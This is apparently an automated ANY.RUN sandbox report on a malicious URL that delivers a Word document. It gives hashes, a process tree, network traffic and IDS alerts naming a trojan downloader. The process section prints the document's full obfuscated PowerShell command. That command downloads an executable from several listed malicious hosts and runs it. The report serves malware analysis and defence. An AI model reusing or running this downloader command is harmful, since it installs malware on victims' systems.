analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://mfj222.co.za/Details/012019

Full analysis: https://app.any.run/tasks/1272460a-5d56-44a1-a281-81099316ac0c
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: January 22, 2019, 16:41:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
opendir
Indicators:
MD5:

0E546EE67D080D0F501336D449F09616

SHA1:

DE23BCB15EC635A3F05AF23AC60C39C7E376DE10

SHA256:

61CA03B086DF15D2082000F1A7A093C6A1D3E08FDE6477503C58F7435BBE3A57

SSDEEP:

3:N1KTTHbdOieoVUc:C3HoIUc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 908)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3816)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2852)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2852)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 3232)
      • WINWORD.EXE (PID: 2852)
    • Application launched itself

      • WINWORD.EXE (PID: 2852)
    • Creates files in the user directory

      • powershell.exe (PID: 3816)
  • INFO

    • Application launched itself

      • chrome.exe (PID: 3232)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 3232)
    • Creates files in the user directory

      • chrome.exe (PID: 3232)
      • WINWORD.EXE (PID: 2852)
    • Dropped object may contain Bitcoin addresses

      • chrome.exe (PID: 3232)
      • WINWORD.EXE (PID: 2852)
    • Reads settings of System Certificates

      • chrome.exe (PID: 3232)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2852)
      • WINWORD.EXE (PID: 3836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
12
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs chrome.exe no specs cmd.exe no specs powershell.exe chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3232"C:\Program Files\Google\Chrome\Application\chrome.exe" http://mfj222.co.za/Details/012019C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3972"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6f5500b0,0x6f5500c0,0x6f5500ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3184"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3236 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
2312"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=952,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=33FF2C0AC3CCF2B4F5A9F9DE1C426F58 --mojo-platform-channel-handle=976 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
3008"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=952,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --service-pipe-token=587870EDE714DF2DF9DDF8B0C0206D68 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=587870EDE714DF2DF9DDF8B0C0206D68 --renderer-client-id=4 --mojo-platform-channel-handle=1868 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
3316"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=952,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --service-pipe-token=4E50E27EBDAC111C814D48DE99A913F9 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4E50E27EBDAC111C814D48DE99A913F9 --renderer-client-id=3 --mojo-platform-channel-handle=2036 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2852"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\190117-Untitled-180888.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3836"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2692"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=952,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=33E7B1F8380DF80BDA3EE1136AF8734F --mojo-platform-channel-handle=3980 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
908"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $recontextualize63='HandcraftedSteelKeyboard36';$CreditCardAccount93=new-object Net.WebClient;$technologies96='http://ayokerja.org/okQHEmqb@http://www.estab.org.tr/U3L2aMZnmE@http://www.teramed.com.co/TWK9BCYzz@http://xyzfilamenten.nl/v4h00iq9W@http://tral24.su/YW50qrlHa'.Split('@');$Fundamental18='JeweleryGarden54';$Manager58 = '718';$CheckingAccount80='Idaho86';$unleash20=$env:public+'\'+$Manager58+'.exe';foreach($MusicMoviesElectronics49 in $technologies96){try{$CreditCardAccount93.DownloadFile($MusicMoviesElectronics49, $unleash20);$Agent92='Practical97';If ((Get-Item $unleash20).length -ge 80000) {Invoke-Item $unleash20;$clicksandmortar48='SMS42';break;}}catch{}}$Rubber78='Practical15'; C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 707
Read events
2 245
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
13
Text files
56
Unknown types
4

Dropped files

PID
Process
Filename
Type
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\6b01bbe3-bb4f-42c5-b8c7-1875e44c0003.tmp
MD5:
SHA256:
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
MD5:
SHA256:
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\d9e14bd3-e1e6-43d3-a05f-5420419e2750.tmp
MD5:
SHA256:
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\39f16d04-1bad-4dea-b44b-161550aa131f.tmp
MD5:
SHA256:
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.oldtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF198ea9.TMPtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
3232chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF198f26.TMPtext
MD5:1AA66EFDB743FB0A8DCC1CD79B0B6542
SHA256:28D56532CCED7375A2A1C7731E57C1A1C2EC1AC9827F3E5BEEE7F8069A5F87DD
3232chrome.exeC:\Users\admin\Downloads\18275209-d037-4f7a-b799-b12da81fa769.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
13
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3816
powershell.exe
GET
500
190.8.176.58:80
http://www.teramed.com.co/TWK9BCYzz
CO
malicious
3232
chrome.exe
GET
200
197.242.147.195:80
http://mfj222.co.za/Details/012019/
ZA
xml
134 Kb
malicious
3816
powershell.exe
GET
200
202.52.147.105:80
http://ayokerja.org/okQHEmqb/
ID
html
971 b
malicious
3232
chrome.exe
GET
301
197.242.147.195:80
http://mfj222.co.za/Details/012019
ZA
html
243 b
malicious
3816
powershell.exe
GET
301
202.52.147.105:80
http://ayokerja.org/okQHEmqb
ID
html
237 b
malicious
3816
powershell.exe
GET
404
94.73.149.212:80
http://www.estab.org.tr/U3L2aMZnmE
TR
html
15.5 Kb
malicious
3816
powershell.exe
GET
503
92.53.96.171:80
http://tral24.su/YW50qrlHa
RU
html
213 b
malicious
3816
powershell.exe
GET
404
137.74.180.117:80
http://xyzfilamenten.nl/v4h00iq9W
NL
html
207 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3232
chrome.exe
172.217.16.195:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3232
chrome.exe
172.217.23.131:443
www.gstatic.com
Google Inc.
US
whitelisted
3232
chrome.exe
172.217.16.142:443
clients4.google.com
Google Inc.
US
whitelisted
3232
chrome.exe
197.242.147.195:80
mfj222.co.za
Afrihost
ZA
malicious
3232
chrome.exe
172.217.22.99:443
ssl.gstatic.com
Google Inc.
US
whitelisted
3232
chrome.exe
172.217.16.173:443
accounts.google.com
Google Inc.
US
whitelisted
3816
powershell.exe
202.52.147.105:80
ayokerja.org
Global Media Teknologi, PT
ID
malicious
3816
powershell.exe
190.8.176.58:80
www.teramed.com.co
Colombia Hosting
CO
malicious
3816
powershell.exe
92.53.96.171:80
tral24.su
TimeWeb Ltd.
RU
malicious
3816
powershell.exe
94.73.149.212:80
www.estab.org.tr
Cizgi Telekomunikasyon Anonim Sirketi
TR
suspicious

DNS requests

Domain
IP
Reputation
www.gstatic.com
  • 172.217.23.131
whitelisted
mfj222.co.za
  • 197.242.147.195
malicious
clientservices.googleapis.com
  • 172.217.16.195
whitelisted
accounts.google.com
  • 172.217.16.173
shared
ssl.gstatic.com
  • 172.217.22.99
whitelisted
clients4.google.com
  • 172.217.16.142
whitelisted
ayokerja.org
  • 202.52.147.105
malicious
www.estab.org.tr
  • 94.73.149.212
malicious
www.teramed.com.co
  • 190.8.176.58
malicious
xyzfilamenten.nl
  • 137.74.180.117
malicious

Threats

PID
Process
Class
Message
3232
chrome.exe
A Network Trojan was detected
ET TROJAN Possible malicious Office doc hidden in XML file
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
Potentially Bad Traffic
ET DNS Query for .su TLD (Soviet Union) Often Malware Related
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3816
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
No debug info